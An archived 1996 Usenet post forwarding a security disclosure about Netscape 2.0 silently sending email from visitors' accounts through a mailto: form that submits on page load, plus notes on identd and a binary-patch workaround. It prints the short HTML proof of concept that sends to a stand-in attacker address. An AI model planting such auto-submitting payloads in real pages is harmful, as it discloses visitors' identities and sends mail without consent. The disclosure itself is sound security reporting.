home *** CD-ROM | disk | FTP | other *** search
/ NetNews Offline 2 / NetNews Offline Volume 2.iso / news / comp / sys / amiga / networking / 3417 < prev    next >
Encoding:
Internet Message Format  |  1996-08-05  |  4.3 KB
  1. Path: news.internetMCI.com!news-admin
  2. From: dgentry@vlsi4.racal.com (Dave Gentry)
  3. Newsgroups: comp.sys.amiga.networking,comp.sys.amiga.datacomm,comp.sys.amiga.misc
  4. Subject: I hope Amiga browsers don't have this NetScape problem!
  5. Date: Wed, 03 Apr 1996 17:53:09 GMT
  6. Organization: InternetMCI
  7. Message-ID: <4ju3bo$jo2@news.internetmci.com>
  8. NNTP-Posting-Host: rdgw.racal.com
  9. X-Newsreader: Forte Free Agent 1.0.82
  10.  
  11. -------------- Forwarded Message begins here ------------
  12.  
  13. From: Julian Assange <proff@suburbia.net> Date: Tue, 12 Mar 1996
  14. 13:05:23 +1000
  15. To: best-of-security@suburbia.net
  16. Subject: BoS: Netscape2.0 sends mail to the world without authority
  17.  
  18. I noticed, while loading a web page, that there was a mailto: URL
  19. active (using the "Easter Egg" Ctrl-Alt-T popup to see active URLs).
  20. Sure enough, after I cancelled that and examined the source, I saw
  21. something like this:
  22.  
  23. <body onLoad=3D"document.mailme.submit()"> <form method=3Dpost
  24. name=3D"mailme" action=3D"mailto:nasty@secret.org?subject=3Dgotcha">
  25. <input type=3Dhidden name=3D"hi" value=3D"there"> </form>
  26.  
  27. A quick test on my local machine shows that this will send a message
  28. to nasty@secret.org with the subject gotcha and the body "hi=3Dthere".
  29.  
  30. This is insidious; it means that E-mail messages, purportedly from me
  31. (and all traces will show they really are from me) can be sent
  32. anywhere, without my knowledge, with contents that I do not approve.
  33. Further, it means that I can no longer count on browsing a site
  34. without my userid being disclosed.**
  35.  
  36. Unlike Java, there is no way to disable this.  [Also been submitted to
  37. Netscape.]
  38.  
  39. - ------------ Forwarded Message ends here ------------
  40.  
  41. Summary:
  42.  
  43. Netscape has not responded this latest discovery yet.  There will
  44. probably be a maintenance release to address this if public outcry is
  45. significant.  Security is not just an issue regarding firewalls.
  46. Several software vendors have quietly installed such options 'for the
  47. users' convenience'.
  48.  
  49. **The reason this is such a problem is a push by various vendors to be
  50. able to identify everyone who visits a web site.  For obvious reasons,
  51. these lists could be used by the vendors for mass mailings, or worse,
  52. sold like mailing lists are sold by magazine publishers.
  53.  
  54. UNIX systems run a daemon (identd) that will gladly reveal the machine
  55. ID when asked by a Web Site that the user is browsing.  This of course
  56. can be turned of, but if not, it will be done without the owner's 
  57.  
  58. -----------------------------------------------------------------------
  59.  
  60. I tested this on SunOS 4.1.3, and it sure works: the Netscape onLoad
  61. function will send mail using your account name and without asking for
  62. confirmation or even informing you.
  63.  
  64. I looked at the Netscape binary with od -s and emacs. The string
  65. "onload" (all lower case) occurs 2 times on itself, between null
  66. characters.  When I patched it, changing the first occurrence to
  67. "onxxad", the resulting binary did not any more obey the "onLoad"
  68. directive and did not obey the "onxxad" directive either.  When I
  69. changed both occurrences of "onload" to "onxxoad", the resulting
  70. binary did not obey the "onLoad" directive, but it did obey the
  71. "onxxad" directive.
  72.  
  73. Note that the Netscape license agreement forbids you to :
  74.  
  75. "... * modify, translate, reverse engineer, decompile, disassemble
  76. (except to the extent applicable laws specifically prohibit such
  77. restriction), or create derivative works based on the Software; ..."
  78.  
  79. So if you patch Netscape to prevent it forging your mail,  you might
  80. be breaking the license.  And of course this kind of binary patching
  81. may easily break something else.  At least it will break any WWW pages
  82. which use the onLoad directive for some other,
  83. more legitimate purpose.
  84.  
  85. So do not do it unless you know exactly what you are doing,
  86. and do not blame me if it does not work or leads to a disaster!
  87.  
  88. If you are really concerned about this thing,  consider sending e-mail
  89. to Netscape Communications Corporation,  explaining to them the
  90. reasons why you think Netscape should not send mail using your
  91. machine, address and account without asking for confirmation.
  92.  
  93. - Tim
  94.  
  95.  
  96. ----- End Forwarded Message -----
  97.  
  98.  
  99.  
  100. This travesty of programming/marketing should be forbidden by law.
  101.  
  102. Spectrum Technologies, Bermuda
  103. Internetworking and Security Consultants (441) 296-2578 Tel
  104. ngentry@ibl.bm
  105. (441) 296-2581 Fax  spectrum@ibl.bm
  106.  
  107. 'Building Castles in the Technological Sand'
  108.  
  109.  
  110.  
  111.